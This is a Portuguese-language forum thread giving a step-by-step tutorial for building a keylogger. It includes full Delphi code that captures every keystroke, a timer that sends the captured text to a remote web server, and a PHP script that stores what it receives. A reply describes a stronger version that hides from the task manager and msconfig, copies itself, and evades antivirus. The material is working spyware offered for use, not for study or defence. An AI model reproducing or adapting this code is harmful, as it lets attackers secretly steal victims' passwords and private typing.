Forum ViSiBLe

Bem Vindo
Se registrares neste fórum, podes fazer parte da nossa comunidade.Prezamos aqui pela participação ACTIVA de cada membro.


Atençao: Nao precisa Confirma a sua conta no hotmail (Basta Registrar e Começar a participar do forum.)
Precisamos de administradores e moderadores!! Clique Aqui!

Anuncio


    [Delphi + PHP] Criando Keylogger com Send Infos PHP

    Compartilhe

    Devaster007
    Membro
    Membro

    Número de Mensagens : 47
    Idade : 29
    Agradecimentos Agradecimentos : 13
    Data de inscrição : 30/01/2011

    [Delphi + PHP] Criando Keylogger com Send Infos PHP

    Mensagem por Devaster007 em 9/14/2011, 15:04

    Criando um Keylogger que Envia Infos para Site


    Primeiramente abra seu IDE Delphi e adicione os seguintes modelos:

    - 2 Timers
    - 1 WebBrowser
    - 1 Memo

    Vamos então adicionar os códigos delphi

    TIMER1:

    procedure TForm1.Timer1Timer(Sender: TObject);
    var
    keyloop, KeyResult : Integer;
    begin
    keyloop := 0;
    repeat
    KeyResult := GetAsyncKeyState(keyloop);
    if KeyResult = -32767 then
    begin
    case keyloop of
    8: Coloca(' [BACKSPACE] ');
    9: Coloca(' [TAB] ');
    12: Coloca(' [ALT] ');
    13: Coloca(' [ENTER] ');
    16: Coloca(' [SHIFT] ');
    17: Coloca(' [CONTROL] ');
    18: Coloca(' [ALT] ');
    20: Coloca(' [CAPS LOCK] ');
    21: Coloca(' [PAGE UP] ');
    27: Coloca(' [ESC] ');
    33: Coloca(' [PAGE UP] ');
    34: Coloca(' [PAGE DOWN] ');
    35: Coloca(' [END] ');
    36: Coloca(' [HOME] ');
    37: Coloca(' [SETA ESQUERDA] ');
    38: Coloca(' [SETA ACIMA] ');
    39: Coloca(' [SETA DIREITA] ');
    40: Coloca(' [SETA ABAIXO] ');
    45: Coloca(' [INSERT] ');
    46: Coloca(' [DEL] ');
    91: Coloca(' [WIN ESQUERDA] ');
    92: Coloca(' [WIN DIREITA] ');
    93: Coloca(' [MENU POP-UP] ');
    96: Coloca('0');
    97: Coloca('1');
    98: Coloca('2');
    99: Coloca('3');
    100: Coloca('4');
    101: Coloca('5');
    102: Coloca('6');
    103: Coloca('7');
    104: Coloca('8');
    105: Coloca('9');
    106: Coloca(' [NUM *] ');
    107: Coloca(' [NUM +] ');
    109: Coloca(' [NUM -] ');
    110: Coloca(' [NUM SEP. DECIMAL] ');
    111: Coloca(' [NUM /] ');
    112: Coloca(' [F1] ');
    113: Coloca(' [F2] ');
    114: Coloca(' [F3] ');
    115: Coloca(' [F4] ');
    116: Coloca(' [F5] ');
    117: Coloca(' [F6] ');
    118: Coloca(' [F7] ');
    119: Coloca(' [F8] ');
    120: Coloca(' [F9] ');
    121: Coloca(' [F10] ');
    122: Coloca(' [F11] ');
    123: Coloca(' [F12] ');
    144: Coloca(' [NUM LOCK] ');
    186: Coloca('Ç');
    187: Coloca('=');
    188: Coloca(',');
    189: Coloca('-');
    190: Coloca('.');
    191: Coloca(';');
    192: Coloca(' [APÓSTROFO] ');
    193: Coloca('/');
    194: Coloca(' [NUM PONTO] ');
    219: Coloca('´');
    220: Coloca(']');
    221: Coloca('[');
    222: Coloca('~');
    226: Coloca('\');
    else
    if (KeyLoop >= 65) and (keyloop <= 90) then
    Coloca(Chr(keyloop));
    if (keyloop >= 32) and (keyloop <= 63) then
    Coloca(Chr(keyloop));
    //numpad keycodes
    if (keyloop >= 96) and (keyloop <= 110) then
    Coloca(Chr(keyloop));
    end;
    end; //case;
    inc(keyloop);
    until keyloop = 255;
    end;


    TIMER2:


    Web.Navigate('[Você precisa estar registrado e conectado para ver este link.] + memo1.text);

    Configure os timers para o seguinte modo:

    Intervalo do Timer 1 = 000001 ms (true)
    Intervalo do Timer 2 = 160000 ms (true)

    NO PHP:

    Então agora vamos para parte php

    Pegue o seguinte código php:

    pagina.php

    Código PHP:
    $set = $_GET['value'];
    $fp = fopen('value.txt', 'w');
    fwrite($fp,$set);
    fclose($fp);
    echo "Sucess";
    ?>
    Hospede em algum local (esta url será colocada no delphi)
    Após hospedar coloque a url no delphi (como dito acima [Você precisa estar registrado e conectado para ver este link.]

    E deixe com Chmod no valor de 777.

    Compile seu Keylogger,execute e acesse o site onde ficaram as informações

    Código:

    [Você precisa estar registrado e conectado para ver este link.]

    Boa sorte com 'projeto',

    jefersonkennedy
    NOOB
    NOOB

    Número de Mensagens : 2
    Idade : 24
    Agradecimentos Agradecimentos : 0
    Data de inscrição : 22/11/2011

    Re: [Delphi + PHP] Criando Keylogger com Send Infos PHP

    Mensagem por jefersonkennedy em 11/22/2011, 18:06

    kkkkk bem parecido com o que eu fiz, só que o meu ta + complexo.

    Sem webbrowser pq consome muita rar

    to usando um idhttp


    Controlo o intervalo dos log
    desativo certas maquinas
    fiz sumir do gerenciador de tarefas e do msconfig

    Alem de rodar oculto no sistema, se auto copia . kkk e ainda fiz ele sumir de alguns AV´s

    Me add te mandei uma MP

      Data/hora atual: 12/2/2016, 15:12